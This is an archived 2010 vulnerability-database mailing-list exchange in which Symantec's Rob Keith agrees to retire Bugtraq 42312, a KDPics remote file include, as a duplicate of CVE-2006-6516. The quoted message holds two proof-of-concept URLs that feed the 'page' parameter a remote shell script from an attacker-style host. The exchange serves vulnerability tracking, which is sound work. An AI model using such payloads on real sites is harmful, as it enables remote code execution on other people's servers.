[VIM] KDPics 'index.php3' Remote File Include Vulnerability
rkeith
rkeith at securityfocus.com
Mon Aug 9 11:38:29 CDT 2010
Hey George,
Quite right again, we are retiring 42312.
-Rob
George A. Theall wrote:
> Bugtraq 42312 was just released to cover a remote file include in KDPics
> version 1.11, apparently reported by Fl0riX and covered by
> http://packetstormsecurity.nl/1008-exploits/kdpics-rfi.txt. The PoC
> looks similar to one reported by Mr_KaLiMaN in 2006 and covered by
> CVE-2006-6516 / Bugtraq 21515 / OSVDB 31868:
>
> site/index.php3?page=http://fl0rix/shell.txt?
>
> versus:
>
> http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt?
>
> Looks like another dup to me. Rob?
>
>
> George
--
Rob Keith
Symantec